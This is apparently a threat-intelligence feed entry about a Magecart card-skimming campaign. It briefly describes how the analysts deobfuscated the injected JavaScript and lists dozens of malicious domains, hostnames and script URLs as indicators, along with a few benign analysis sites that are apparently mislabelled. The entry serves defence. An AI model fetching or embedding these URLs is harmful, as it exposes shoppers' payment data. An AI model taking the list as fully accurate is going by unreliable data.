← Back to Pulse Feed
PULSE DETAIL
PULSE NAME
Magecart Skimmer Analysis: From One Tweet to a Campaign.
Recent investigations into Magecart campaigns have revealed a sophisticated approach to malicious JavaScript injection aimed at skimming payment data from compromised ecommerce websites. The analysis began with an initial observation from a single tweet referencing the potential involvement of a Magecart-style operation specifically targeting http://cc-analytics.com. This prompted further inquiry into the methods used by threat actors.
Key to understanding the attack technique was the deobfuscation of malicious scripts. Analysts utilized a debugging method by prefixing the script with "debugger;" and executing it in browser developer tools. Additionally, they employed Python to decode the obfuscated strings, which utilized hexadecimal values and \x representations, thereby simplifying the extraction of relevant content.
MITRE ATT&CK & Malware Families
| TYPE | INDICATOR | DESCRIPTION | CREATED | |
|---|---|---|---|---|
| URL | http://getnjs.com/util.js | — | 2025-09-19 | |
| URL | https://obf-io.deobfuscate.io | — | 2025-09-19 | |
| URL | https://www.cc-analytics.com/app.js | — | 2025-09-19 | |
| URL | https://www.pstatics.com/i' | — | 2025-09-19 | |
| domain | cc-analytics.com | — | 2025-09-19 | |
| domain | cc-analytis.com | — | 2025-09-19 | |
| domain | getctctm.com | — | 2025-09-19 | |
| domain | getejs.com | — | 2025-09-19 | |
| domain | getnjs.com | — | 2025-09-19 | |
| domain | getvjs.com | — | 2025-09-19 | |
| domain | jgetjs.com | — | 2025-09-19 | |
| domain | pstatics.com | — | 2025-09-19 | |
| domain | secwf02help.com | — | 2025-09-19 | |
| domain | secwf03help.com | — | 2025-09-19 | |
| domain | util-analytics.com | — | 2025-09-19 | |
| domain | utilanalytics.com | — | 2025-09-19 | |
| domain | validin.com | — | 2025-09-19 | |
| domain | youtuber-dashboardwme.pro | — | 2025-09-19 | |
| domain | zksyn.org | — | 2025-09-19 | |
| hostname | 45-61-136-141.cprapid.com | — | 2025-09-19 | |
| hostname | accounts.youtuber-dashboardwme.pro | — | 2025-09-19 | |
| hostname | airdrop.zksyn.org | — | 2025-09-19 | |
| hostname | dao.zksyn.org | — | 2025-09-19 | |
| hostname | help.router-hosting.com | — | 2025-09-19 | |
| hostname | mail.45-61-136-141.cprapid.com | — | 2025-09-19 | |
| hostname | ns2.equiqualification.org | — | 2025-09-19 | |
| hostname | ns2.evenreadiness.org | — | 2025-09-19 | |
| hostname | ns2.gajinpluto.org | — | 2025-09-19 | |
| hostname | ns2.suitabilityshop.org | — | 2025-09-19 | |
| hostname | obf-io.deobfuscate.io | — | 2025-09-19 | |
| hostname | t.zksyn.org | — | 2025-09-19 | |
| hostname | www.45-61-136-141.cprapid.com | — | 2025-09-19 | |
| hostname | www.cc-analytics.com | — | 2025-09-19 | |
| hostname | www.cc-analytis.com | — | 2025-09-19 | |
| hostname | www.getctctm.com | — | 2025-09-19 | |
| hostname | www.getejs.com | — | 2025-09-19 | |
| hostname | www.getnjs.com | — | 2025-09-19 | |
| hostname | www.getvjs.com | — | 2025-09-19 | |
| hostname | www.jgetjs.com | — | 2025-09-19 | |
| hostname | www.pstatics.com | — | 2025-09-19 | |
| hostname | www.secfw03secur.com | — | 2025-09-19 | |
| hostname | www.secwf02help.com | — | 2025-09-19 | |
| hostname | www.secwf03help.com | — | 2025-09-19 | |
| hostname | www.util-analytics.com | — | 2025-09-19 | |
| hostname | www.utilanalytics.com | — | 2025-09-19 | |
| hostname | www.zksyn.org | — | 2025-09-19 |